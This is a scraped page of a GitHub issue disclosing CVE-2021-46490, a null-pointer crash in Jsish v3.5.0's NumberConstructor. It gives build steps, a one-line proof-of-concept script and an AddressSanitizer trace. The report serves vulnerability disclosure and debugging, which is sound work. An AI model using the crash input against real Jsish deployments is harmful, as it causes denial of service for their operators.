Headline

CVE-2021-46490: SEGV src/jsiNumber.c:93 in NumberConstructor · Issue #67 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a SEGV vulnerability via NumberConstructor at src/jsiNumber.c. This vulnerability can lead to a Denial of Service (DoS).

2 years ago

CVE

Open in Source

#vulnerability #mac #ubuntu #linux #dos #js #git

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 2 comments

Comments

@hope-fly

Jsish revision

Commit: 9fa798e

Version: v3.5.0

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

export CFLAGS=’-fsanitize=address’ make

Test case

var list = [ 'aa’, ‘hh’ ]; Number.bind(2, 4)();

Execution steps & Output

$ ./jsish/jsish poc.js

ASAN:DEADLYSIGNAL

=====ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55d872876fd3 bp 0x7ffd8a3d6b10 sp 0x7ffd8a3d6240 T0) =====The signal is caused by a READ memory access. =====Hint: address points to the zero page. #0 0x55d872876fd2 in NumberConstructor src/jsiNumber.c:93 #1 0x55d87284a818 in jsi_FuncCallSub src/jsiProto.c:244 #2 0x55d8727c7fec in jsi_FunctionInvoke src/jsiFunc.c:777 #3 0x55d8727c7fec in Jsi_FunctionInvoke src/jsiFunc.c:789 #4 0x55d872843ad6 in jsi_FuncBindCall src/jsiProto.c:299 #5 0x55d87284a818 in jsi_FuncCallSub src/jsiProto.c:244 #6 0x55d872b1471a in jsiFunctionSubCall src/jsiEval.c:796 #7 0x55d872b1471a in jsiEvalFunction src/jsiEval.c:837 #8 0x55d872b1471a in jsiEvalCodeSub src/jsiEval.c:1264 #9 0x55d872b2815e in jsi_evalcode src/jsiEval.c:2204 #10 0x55d872b2c274 in jsi_evalStrFile src/jsiEval.c:2665 #11 0x55d87281b66a in Jsi_Main src/jsiInterp.c:936 #12 0x55d87302003a in jsi_main src/main.c:47 #13 0x7fb276e6fbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #14 0x55d8727af969 in _start (/usr/local/bin/jsish+0xe8969)

AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/jsiNumber.c:93 in NumberConstructor

Credits: Found by OWL337 team.

@hope-fly

This issue may have a correlation with #66, but I’m not for sure. Report this issue to assist your debug.

@pcmacdon